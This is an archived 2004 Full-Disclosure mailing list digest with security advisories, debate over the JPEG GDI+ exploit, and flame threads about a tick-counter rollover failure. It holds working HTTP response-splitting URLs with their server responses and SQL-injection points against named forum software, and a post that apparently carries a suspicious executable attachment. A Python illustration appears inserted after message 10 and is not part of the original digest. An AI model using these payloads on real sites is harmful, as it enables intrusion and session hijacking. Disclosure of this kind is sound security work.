
| Subject: | RE: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1933 - 20 msgs |
|---|---|
| Date: | Tue, 28 Sep 2004 11:41:48 -0500 |
It is possible to view a JPEG in an unpatched IE and it will automatically install programs. This is my understanding.

-----Original Message-----
From: full-disclosure-admin@lists.netsys.com [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of milw0rm Inc.
Sent: Monday, September 27, 2004 1:12 PM
To: full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1933 - 20 msgs

JPEG GDI problem,

Isn't this problem only capable of running if the JPEG was opened via the user's actions? Is it possible that web pages could be affected with JPEGs with Internet Explorer viewing them? I wouldn't think so, since from what I have read in multiple people's articles it isn't this kind of bug. Info needed.

Regards,
str0ke

On Mon, 27 Sep 2004 12:00:05 -0400, full-disclosure-request@lists.netsys.com <full-disclosure-request@lists.netsys.com> wrote:
Send Full-Disclosure mailing list submissions to
full-disclosure@lists.netsys.com
To subscribe or unsubscribe via the World Wide Web, visit
http://lists.netsys.com/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
full-disclosure-request@lists.netsys.com
You can reach the person managing the list at
full-disclosure-admin@lists.netsys.com
When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."
Today's Topics:

1. RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 (Exibar)
2. RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 (Ron DuFresne)
3. RE: Full-Disclosure: JEPG Hype or Hope? (RandallM)
4. SANS GDIscan (bashis)
5. HTTP Response Splitting and SQL injection in megabbs forum (pigrelax)
6. SQL injection in BroadBoard Instant ASP Message Board (pigrelax)
7. Re: HTTP Response Splitting and SQL injection in megabbs forum (PD9 Software)
8. Re: Re: HTTP Response Splitting and SQL injection in megabbs forum (DanB UK)
9. RE: Windoze almost managed to 200x repeat 9/11 (joe)
10. Re: Windoze almost managed to 200x repeat 9/11 (Barry Fitzgerald)
11. Re: Windoze almost managed to 200x repeat 9/11 (Vince Able)
12. Re: Windoze almost managed to 200x repeat 9/11 (ASB)
13. RE: Full-Disclosure: JEPG Hype or Hope? (r00t3d)
14. Re: Msg reply (Elvi)
15. [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in libXpm (Thierry Carrez)
16. [gentoo-announce] [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in libXpm (Thierry Carrez)
17. [SECURITY] [DSA 553-1] New getmail packages fix root compromise (debian-security-announce@lists.debian.org)
--__--__--

Message: 1
From: "Exibar" <exibar@thelair.com>
To: "ASB" <abaker@gmail.com>, <full-disclosure@lists.netsys.com>
Subject: RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
Date: Sun, 26 Sep 2004 12:15:26 -0400

Exactly. Some idiot decided to program the entire system to shut down after 49 days. What an idiot; why not just set up a maintenance program to perform a scheduled re-boot of the system instead of having an automated process shut down the system and then have to schedule a work-around for this by scheduling a manual boot every 30 days (which someone forgot). This whole thing wasn't Windows' fault, but an idiot programmer/manager/whatever's fault.

Exibar

-----Original Message-----
From: ASB [mailto:abaker@gmail.com]
Sent: Sunday, September 26, 2004 10:56 AM
To: full-disclosure@lists.netsys.com
Subject: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Next time, please read the thread in context.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The context of the thread is that an application issue is being incorrectly interpreted as an OS issue.

-ASB

On Fri, 24 Sep 2004 14:43:53 -0400, Barry Fitzgerald <bkfsec@sdf.lonestar.org> wrote:
> ASB wrote:
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > Where issues like this relate to the OS is in the fact that the OS itself shouldn't be brought down by a poorly designed app.
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> > And where in that article did you read that the OS was brought down by a poorly designed app?
>
> I didn't... I was responding to a point that was made about applications being responsible for system failures.
>
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > Was it MS Windows that actually held the code that brought the system down?
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> > The article was pretty clear:
> > <snip>
> > How you managed to read "OS failure" into this is rather astounding...
>
> How you manage to get up in the morning is rather astounding.
>
> Next time, please read the thread in context. Also, if you think that that's a detailed assessment of the problem, you're not too bright. So try and think a little harder next time, and not be so abrasive.
>
> You may be having a bad day (most likely due to your poor attitude) but don't take your own misunderstanding out on others, mmkay?
>
> -Barry

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

--__--__--

Message: 2
Date: Sun, 26 Sep 2004 11:48:22 -0500 (CDT)
From: Ron DuFresne <dufresne@winternet.com>
To: Exibar <exibar@thelair.com>
cc: ASB <abaker@gmail.com>, <full-disclosure@lists.netsys.com>
Subject: RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

On Sun, 26 Sep 2004, Exibar wrote:

> Exactly. Some idiot decided to program the entire system to shut down after 49 days. What an idiot; why not just set up a maintenance program to perform a scheduled re-boot of the system instead of having an automated process shut down the system and then have to schedule a work-around for this by scheduling a manual boot every 30 days (which someone forgot).

Which, likely in this case, would have to somehow be monitored, seems to be a pretty critical application, one in which lives are dependent, and it is entirely possible the system might not recover from a reboot.
Thanks,
Ron DuFresne
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
--__--__--
Message: 3
From: "RandallM" <randallm@fidmail.com>
To: <full-disclosure@lists.netsys.com>
Date: Sun, 26 Sep 2004 12:02:20 -0500
Subject: [Full-Disclosure] RE: Full-Disclosure: JEPG Hype or Hope?
What exactly would one gain by creating a PoC on this exploit? How exactly does this compare to meaningful disclosures that were revealed because someone would not listen or ignored the warnings of their security vulnerability?

I mean, this is nothing like a program goof that allows clear-text passwords or exposes files or the like. This exploit (if it can be called that) took a lot of thought to create it and exploit it. Correct me if I'm wrong, but it does not fall into the category of "exploit" as defined by this list. This was truly a "created exploit" that would not be there otherwise. This took intelligent input. This is nothing more than a black-hat attack. It is not a meaningful revealing of poor security as I've seen defined on this list.

> --__--__--
>
> Message: 13
> From: "i.t " <fulldis@it97.dyndns.org>
> Organization: i.t consulting
> To: full-disclosure@lists.netsys.com
> Date: Sun, 26 Sep 2004 11:57:33 +0200
> Subject: [Full-Disclosure] Re: MS04-028 Jpeg EXPLOIT - msn
>
> > On Saturday 25 September 2004 16:59, raza wrote:
> > > I just compiled this and it works well..
> > ...
> > yes and it works very well.
> > > I can see this one's gonna be fun...
> > We'll have a worm within days.
>
> For nearly all of my clients using Win XP I've deinstalled Win Messenger. One urgently wanted it back for communicating in real-time; and, of course, it's much more fun seeing a live picture of the counterpart(s) in the chat window...
>
> Even having installed SP2 and the newest patches plus AV, I can imagine a virus spreading within those pictures throughout the whole MSN and so on...
>
> Any other defense? Or is this too much paranoia?
>
> i.t
>
> --__--__--

--__--__--

Message: 4
To: full-disclosure@lists.netsys.com
Date: Sun, 26 Sep 2004 17:34:04 +0200 (CEST)
From: bashis <mcw@wcd.se>
Reply-To: mcw@wcd.se
Subject: [Full-Disclosure] SANS GDIscan

Hi

I tested [1] 'gdiscan' from SANS, and this tool reports vulnerable DLLs after installing all available patches from M$..

WinXP Pro SP1
C:\WINDOWS\system32\gdiplus.dll
Version: 5.1.3097.0 <-- Vulnerable version

Win2k Server SP4
C:\Program Files\Common Files\Microsoft Shared\Ink\gdiplus.dll
Version: 5.1.3097.0 <-- Vulnerable version

[1] http://isc.sans.org/gdiscan.php

Have a nice day
/bashis

--__--__--

Message: 5
From: "pigrelax" <pigrelax@yandex.ru>
To: <full-disclosure@lists.netsys.com>
Cc: <bugtraq@Securityfocus.com>, <info@pd9soft.com>
Date: Sun, 26 Sep 2004 21:56:44 +0400
Subject: [Full-Disclosure] HTTP Response Splitting and SQL injection in megabbs forum
URL: http://www.pd9soft.com
Tested megabbs 2.1

1. HTTP Response Splitting

http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat

Result:
<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:14:02 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33

<html>Scanned by Maxpatrol</html>
Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:13:02 GMT
Set-Cookie: guestID=309; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/
Cache-contro
<...>

2. HTTP Response Splitting

http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e%0d%0a&action=writenew&displaytype=flat

Result:
<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:34:05 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33

<html>Scanned by Maxpatrol</html>
Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:33:05 GMT
Set-Cookie: guestID=421; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/
Cache-contro
<...>

3. More and more SQL injection:

ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'

MaxPatrol is a professional network security scanner distinguished by its uncompromisingly high quality of scanning, optimized for effective use by companies of any size (serving from a few to tens of thousands of nodes). MaxPatrol developers were able quite simply to "ignore" about 40% of the newly published vulnerabilities because their product's intelligent algorithms had already detected them.
http://www.Maxpatrol.com

--__--__--

Message: 6
From: "pigrelax" <pigrelax@yandex.ru>
To: <full-disclosure@lists.netsys.com>
Cc: <bugtraq@Securityfocus.com>
Date: Mon, 27 Sep 2004 00:09:32 +0400
Subject: [Full-Disclosure] SQL injection in BroadBoard Instant ASP Message Board
BroadBoard Instant ASP Message Board
URL: http://www.broadboard.com/

1. Software does not properly validate user-supplied input in the 'keywords' parameter in search.asp:

http://broadboard/forum/search.asp?archives=1&action=1&keywords=['SQL code]&method=1&method=1&body=1&subject=1&board=1&results=1

2. Software does not properly validate user-supplied input in the 'handle' parameter in profile.asp:

http://broadboard/forum/profile.asp?handle=['SQL code]

3. Software does not properly validate user-supplied input in the 'txtUserHandle' parameter in reg2.asp:

POST /forum/reg2.asp HTTP/1.1
Host: broadboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 121

txtNameFirst=1&txtNameLast=1&txtUserEmail=sales@maxpatrol.com&txtUserHandle=['SQL code]&txtUserPwd=1&txtUserCPwd=1&cmdRegister=1

4. Software does not properly validate user-supplied input in the 'txtUserEmail' parameter in forgot.asp:

POST /forum/forgot.asp HTTP/1.1
Host: broadboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

txtUserEmail=['SQL code]&cmdSend=1

http://www.Maxpatrol.com

--__--__--

Message: 7
Date: Sun, 26 Sep 2004 13:50:50 -0500
From: PD9 Software <info@pd9soft.com>
CC: full-disclosure@lists.netsys.com, bugtraq@Securityfocus.com
Subject: [Full-Disclosure] Re: HTTP Response Splitting and SQL injection in megabbs forum
pigrelax wrote:
> URL: http://www.pd9soft.com
> Tested megabbs 2.1
>
> 1. HTTP Response Splitting
> 2. HTTP Response Splitting
> 3. More and more SQL injection:

All three issues have been addressed, and updates have been posted at http://www.pd9soft.com/. Thank you for bringing them to my attention.

However, in the future, would it be too much to ask that I am contacted first? I am very eager to fix any security vulnerabilities, but sipping coffee on a lazy Sunday afternoon and seeing this broadcast to a public list is a little disconcerting.

Thanks,
Matt Summers
PD9 Software, Inc

--__--__--

Message: 8
Date: Sun, 26 Sep 2004 23:12:42 +0100
From: DanB UK <danbuk@gmail.com>
Reply-To: DanB UK <danbuk@gmail.com>
To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Re: HTTP Response Splitting and SQL injection in megabbs forum
It seems like the OP was actually just trying to advertise their (or an affiliate's) product. I would say that it's not the 'done' thing.

> However in the future, would it be too much to ask that I am contacted first? I am very eager to fix any security vulnerabilities, but sipping coffee on a lazy Sunday afternoon and seeing this broadcast to a public list is a little disconcerting.

I understand your concern.

Regards,
Daniel
--
DanB UK
London, UK

--__--__--

Message: 9
From: "joe" <mvp@joeware.net>
To: "'devis'" <devis@easynix.net>
Cc: <full-disclosure@lists.netsys.com>
Subject: RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
Date: Sun, 26 Sep 2004 18:42:29 -0400

I get paid nothing to hang out on this list. In fact many of my friends feel I am wasting considerable time here because the vast majority of the people are Linux bigots simply holding each others', ummm, hands. Once in a while though some seriously good information or conversation occurs here, which is why I like to hang out, and most of my responses tend to be offlist. Occasionally I like to dampen some of the occasional this or that about how bad Windows sucks from people who don't know enough about how it works to even have a very good opinion. They are intelligent people mostly, they just have a hamster up their bum about billg or MS for some reason.

It is funny to me how this thread came onto the list as a "Windows sucks" thread when it should have been a serious "some programmers don't understand data types sucks" thread. It is poor programming habits like this that cause a great deal of the flaws in apps and OSes that others take advantage of. Programmers need to understand the proper way to handle the datatypes they use in their applications, whether it be checking for data size constraints or data range constraints.

As for missing out on cash or something from MS, I am not so sure MS would have me as an employee at the moment as I spend considerable time banging on them and their OS and choices. I don't do it out in the public lists like this as I am trying to be a righteous d00d to all of you cool people. I bang on them in the private groups that have MS people seriously looking to make things better.

For this specific thread, my main point is that someone who can't figure out that an unsigned integer value that is incrementing will roll at some point is a dangerous programmer no matter what OS they are on. This has nothing to do with Windows or any OS. It is how computers work, period. There isn't a single OS out there on which you could constantly increment a 32-bit unsigned counter and not roll to zero. This is way below anything the OS can control. At best it halts the program as soon as the overflow kicks in. That really wouldn't help much except possibly with data corruption. I don't think an OS should be protecting apps from data corruption due to the app losing count though.

joe

-----Original Message-----
From: full-disclosure-admin@lists.netsys.com [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of devis
Sent: Saturday, September 25, 2004 12:49 PM
Cc: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
Joe dude, how much are you getting from M$ a month to hang around this list? Zero? No way.... send 'em a letter now dude.

And please don't serve me 'just being objective' crap; you HAVE to be interested to defend it that well. If not, well, you may be missing out on something...

joe wrote:

> Definitely some interesting theories Ron.
>
> > 1> the code was better done under the original OS, unix
>
> While possible, nothing actually points at this as being the case. Anyway, I would be curious as to the functionality of the system when it was first launched on UNIX versus the end-result. Put this on Windows and run it 10 years and then port to UNIX or *nix and there will almost certainly be screwups there as well. In fact, I would be pretty confident. I have dealt with poor ports to and from Windows and *nix. I have even dealt with bad ports from Mainframes to UNIX where the whole time the Mainframe people were saying the same types of things about UNIX that you like to say about Windows. Being a good coder for one OS doesn't make you one for all OSes when dealing with system level components and interfaces.
>
> > 2> considering "how often" you seem to run into this same issue with other coders in the windows realm, windows coders tend to be especially lazy/clueless as compared to coders in other OS'
>
> I would expect the issue is the same as always. Sheer volume. There are good and bad coders, period. Microsoft has surely drawn more poor coders than any other OS with its pushing of the RAD/simple coding environment such as VB. Additionally the Windows environment as a whole has more inexperienced users and admins and people likely to try and code. There are also many good ones as well, they are just well buried in the poor ones.
>
> > 3> tools to code with in the windows realm are not as developed/functional as they are in other envs
>
> I would say this opinion is uninformed.
>
> > 4> M$ does not properly provide developers with clued information with which to do their jobs
>
> This is another opinion which I would call rather uninformed. Even if there was poor function documentation, if you have a function, any function, returning a constantly increasing counter you know, as a skilled programmer, that eventually it has to do something other than increase. If the value is signed the sign bit will flip, or if it is unsigned it will roll to 0. How can a good programmer think any other thing? The compiler could have inserted exception handling code, but at best that is simply going to bounce the program out of a normal running state. That is a compiler thing though, not an OS thing. I do hope you aren't trying to tell me that UNIX can magically and infinitely maintain a counter on a variable with a fixed bit size. I try to consider you to be a bit more intelligent than that.
>
> To put it another way, if you have a set of tires on a car that are rated for 75 MPH (say off-road truck tires) and some person goes 90 and the tires fly apart or the vehicle flips or both, is the issue the driver, the vehicle manufacturer, the tire manufacturer, or the tree that produced the rubber for the tire? This is the same sort of case. You have it in your mind ahead of time who you want to be at fault because you have a bug up your bum about it and work to prove that stance.
>
> Poor coding is a result of poor coders. I have seen amazingly bad code on all OS/RTS platforms I have worked on from RSTS to BSD to Linux to Windows to DOS to VMS. I have also seen some amazingly good stuff on the same platforms. Someone who doesn't understand basic data types and how to handle their limits is going to do a shitty job on all of the platforms.
>
> Is the ratio of good admins to bad admins better in UNIX versus Windows? Absolutely. Is the ratio of good programmers to bad programmers better in UNIX versus Windows? Most certainly. Does this mean all Windows admins are bad admins? Obviously not. Does this mean all Windows programmers are bad programmers? Obviously not. I specifically say UNIX versus *nix because I think *nix is one or more steps closer to Windows in this discussion and getting closer as its popularity grows with Windows users. Switching to *nix doesn't make the admins or coders switching (or just using in tandem) any better simply because they switched.
>
> -----Original Message-----
> From: Ron DuFresne [mailto:dufresne@winternet.com]
> Sent: Friday, September 24, 2004 11:25 PM
> To: joe
> Cc: mcw@wcd.se; full-disclosure@lists.netsys.com
> Subject: RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
>
> On Fri, 24 Sep 2004, joe wrote:
>
> > Again, there are valid uses of GetTickCount and there are safe ways of doing so. If there is concern, I do recommend testing functionality associated with each of the DLLs. You might find a bug you can report for kudos.
> >
> > On the incident, I would guess the vendor never had a clue it would do that.
> >
> > That function can't return more than 49.7 days without breaking every app that currently uses it. MS can not do that. That is why there is another function to get the info with a different datatype. See my other posts.
>
> What seems to read clearly from your replies to this thread is that either;
>
> 1> the code was better done under the original OS, unix
> 2> considering "how often" you seem to run into this same issue with other coders in the windows realm, windows coders tend to be especially lazy/clueless as compared to coders in other OS'
> 3> tools to code with in the windows realm are not as developed/functional as they are in other envs
> 4> M$ does not properly provide developers with clued information with which to do their jobs
>
> From which you can combine any or all of the above for a correct interpretation of the total of your replies.
>
> Thanks,
>
> Ron DuFresne

--__--__--

Message: 10
Date: Sun, 26 Sep 2004 20:41:34 -0400
From: Barry Fitzgerald <bkfsec@sdf.lonestar.org>
To: ASB <abaker@gmail.com>
CC: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
ASB wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Next time, please read the thread in context.
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> The context of the thread is that an application issue is being incorrectly interpreted as an OS issue.

Oversimplification is for the foolish. Like I said, you're not too bright. You're showing very little understanding of system architecture here.

My point regarding where the code was located had to do with a generalized statement regarding applications being at fault for issues and for them not being OS issues. My point was that it's not always clear cut.

I was not trying to say that this case was an OS issue. I was trying to say that the line is not always black and white. I was also pointing out that none of us know because the only information we have to go on is third-hand and imprecise.

If you can predict conditions based on imprecise third-hand information, then what are you doing here?!? Go solve the world's problems or something. Of course, you can't, so you've decided to just flame people.

Please re-read my posts and think before you respond.

If, besides misreading my posts, you can find no argument with what I've said (which you won't, because I'm right) then I'm willing to hear them. Other than that, you're just wasting everyone's time by trying to railroad points that you don't understand.
-Barry
--__--__--
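Joe's point in this thread, that a 32-bit unsigned millisecond counter such as GetTickCount must roll over (the 49.7 days several posters mention) and that the application has to cope with it, is easy to see in code. The following is an added illustration, not code any poster wrote; it models the counter in Python with explicit 32-bit masking (the real API is a Windows call), and both timer scenarios are constructed.

```python
"""Model of a 32-bit millisecond uptime counter (the DWORD that
GetTickCount returns) and two ways application code consumes it:
an absolute deadline that breaks at rollover, and a modular
elapsed-time calculation that survives it.  Added illustration,
not code from any poster; the scenarios are constructed."""

MASK32 = 0xFFFFFFFF            # a DWORD holds milliseconds modulo 2**32
MS_PER_DAY = 24 * 60 * 60 * 1000


def rollover_days() -> float:
    """Uptime after which a 32-bit millisecond counter wraps to zero."""
    return (MASK32 + 1) / MS_PER_DAY       # ~49.71 days, the figure in the thread


def tick_count(uptime_ms: int) -> int:
    """Stand-in for GetTickCount(): true uptime truncated to 32 bits."""
    return uptime_ms & MASK32


def as_signed32(tick: int) -> int:
    """What the same bits read as if the app stores the DWORD in a signed int
    (the 'sign bit will flip' case joe describes)."""
    tick &= MASK32
    return tick - (1 << 32) if tick & 0x80000000 else tick


def elapsed_ms(start_tick: int, now_tick: int) -> int:
    """Elapsed time between two samples, correct across one rollover.

    Unsigned subtraction modulo 2**32 gives the right interval as long as the
    interval itself is shorter than the counter period."""
    return (now_tick - start_tick) & MASK32


def naive_timer_expired(start_tick: int, timeout_ms: int, now_tick: int) -> bool:
    """The fragile pattern: precompute an absolute deadline, compare against it.

    If start + timeout wraps, the deadline is a small number and the timer
    fires at once; if 'now' wraps instead, the timer never fires."""
    deadline = (start_tick + timeout_ms) & MASK32
    return now_tick >= deadline


def safe_timer_expired(start_tick: int, timeout_ms: int, now_tick: int) -> bool:
    """The robust pattern: compare modular elapsed time with the timeout."""
    return elapsed_ms(start_tick, now_tick) >= timeout_ms


ROLLOVER = MASK32 + 1          # the instant the counter returns to zero
TIMEOUT_MS = 5_000


def scenario_fires_early():
    """Constructed: timer armed 1 s before rollover, checked 0.5 s later.
    Returns (elapsed_ms, naive_verdict, safe_verdict)."""
    armed, now = tick_count(ROLLOVER - 1_000), tick_count(ROLLOVER - 500)
    return (elapsed_ms(armed, now),
            naive_timer_expired(armed, TIMEOUT_MS, now),
            safe_timer_expired(armed, TIMEOUT_MS, now))


def scenario_never_fires():
    """Constructed: timer armed 6 s before rollover, checked 7 s later
    (1 s after the wrap).  Returns (elapsed_ms, naive_verdict, safe_verdict)."""
    armed, now = tick_count(ROLLOVER - 6_000), tick_count(ROLLOVER + 1_000)
    return (elapsed_ms(armed, now),
            naive_timer_expired(armed, TIMEOUT_MS, now),
            safe_timer_expired(armed, TIMEOUT_MS, now))


if __name__ == "__main__":
    print(f"counter period: {rollover_days():.2f} days")
    print("armed 1 s before wrap, checked after 0.5 s:", scenario_fires_early())
    print("armed 6 s before wrap, checked after 7 s:  ", scenario_never_fires())
```

The naive check is wrong in both directions while the modular subtraction is right in both, which is why the "reboot every 30 days" workaround in the article was papering over an application bug rather than an OS limit.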
Message: 11
From: "Vince Able" <we_hate_vince@hotmail.com>
To: <full-disclosure@lists.netsys.com>
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
Date: Sun, 26 Sep 2004 21:24:27 -0400
Organization: The Ram Group

Well what a nice first post to read entering Full-Disclosure. LoL

----- Original Message -----
From: "Barry Fitzgerald" <bkfsec@sdf.lonestar.org>
To: "ASB" <abaker@gmail.com>
Cc: <full-disclosure@lists.netsys.com>
Sent: Sunday, September 26, 2004 8:41 PM
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

ASB wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Next time, please read the thread in context.
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> The context of the thread is that an application issue is being incorrectly interpreted as an OS issue.

Oversimplification is for the foolish. Like I said, you're not too bright. You're showing very little understanding of system architecture here.

My point regarding where the code was located had to do with a generalized statement regarding applications being at fault for issues and for them not being OS issues. My point was that it's not always clear cut.

I was not trying to say that this case was an OS issue. I was trying to say that the line is not always black and white. I was also pointing out that none of us know because the only information we have to go on is third-hand and imprecise.

If you can predict conditions based on imprecise third-hand information, then what are you doing here?!? Go solve the world's problems or something. Of course, you can't, so you've decided to just flame people.

Please re-read my posts and think before you respond.

If, besides misreading my posts, you can find no argument with what I've said (which you won't, because I'm right) then I'm willing to hear them. Other than that, you're just wasting everyone's time by trying to railroad points that you don't understand.

-Barry

--__--__--

Message: 12
Date: Sun, 26 Sep 2004 22:36:12 -0400
From: ASB <abaker@gmail.com>
Reply-To: ASB <abaker@gmail.com>
To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
There was more than enough information provided in the initial link, besides what was available to those who took a moment or 3 to search for additional info, to avoid coming to the conclusion that the OS was the fault here.

The mere fact that thousands, if not millions, of people manage to run Windows 2000 systems which do not keel over every 49.7 days would tend to cause one to look elsewhere for the source of the issue.

Beyond that, the wording of the various articles on this issue that I looked at made it rather obvious that there was an issue with the APPLICATION which rendered it useless if certain operator steps were not performed. No matter how scanty you feel the articles were, they never even implied that the OS was inoperable during any of this.

While it is certainly important to have as much information as possible before rendering verdicts of any sort, and while not every issue can be definitively outlined as jet black or lily white, there's not a whole lot more forensics that's needed to conclude that the root of the issue is one of application development, compounded by the failure of an operator to perform a prescribed workaround at the appointed time.

The irony here is that you're accusing me of not reading or comprehending.

-ASB

On Sun, 26 Sep 2004 20:41:34 -0400, Barry Fitzgerald <bkfsec@sdf.lonestar.org> wrote:
> ASB wrote:
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > Next time, please read the thread in context.
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> > The context of the thread is that an application issue is being incorrectly interpreted as an OS issue.
>
> Oversimplification is for the foolish. Like I said, you're not too bright. You're showing very little understanding of system architecture here.
>
> My point regarding where the code was located had to do with a generalized statement regarding applications being at fault for issues and for them not being OS issues. My point was that it's not always clear cut.
>
> I was not trying to say that this case was an OS issue. I was trying to say that the line is not always black and white. I was also pointing out that none of us know because the only information we have to go on is third-hand and imprecise.
>
> If you can predict conditions based on imprecise third-hand information, then what are you doing here?!? Go solve the world's problems or something. Of course, you can't, so you've decided to just flame people.
>
> Please re-read my posts and think before you respond.
>
> If, besides misreading my posts, you can find no argument with what I've said (which you won't, because I'm right) then I'm willing to hear them. Other than that, you're just wasting everyone's time by trying to railroad points that you don't understand.
>
> -Barry

--__--__--

Message: 13
Date: Sun, 26 Sep 2004 22:20:29 -0700
From: r00t3d <r00t3d@gmail.com>
Reply-To: r00t3d <r00t3d@gmail.com>
To: randallm@fidmail.com, full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] RE: Full-Disclosure: JEPG Hype or Hope?

Dear RandallM,

> This exploit (if it can be called that) took a lot of thought to create it and exploit it.

Yea, lots of thought, and ripped shellcode to boot! Can't beat that, can ya?

> Correct me if I'm wrong but it does not fall into the category of "exploit" as defined by this list.

Okay, you're wrong.

> This was truly a "created Exploit"

Seriously? I didn't know exploits were "created". I always thought they just appeared.

> This is nothing more than a black-hat attack. It is not a meaningful revealing of poor security as I've seen defined on this list.

Uh oh, are the blaqhats after us again?? I think we had all better just pull our whitehats down over our heads and hope they go away. I hear, if you don't move, the blaqhats won't notice you and will leave, kind of like with bears. Anyways, last time I checked, it wasn't blaqhats that disclosed exploits, it was whitehats and scene whores.

Love,
#MSNetworks

--__--__--

Message: 14
Date: Mon, 27 Sep 2004 09:03:35 +0200
To: "Full-disclosure" <full-disclosure@lists.netsys.com>
From: "Elvi" <elvi52001@yahoo.com>
Subject: [Full-Disclosure] Re: Msg reply

----------tthzhwewredcturxosqp
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit

<html><body>
<br>
</body></html>

----------tthzhwewredcturxosqp
Content-Type: application/octet-stream; name="Loves_money.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Loves_money.exe"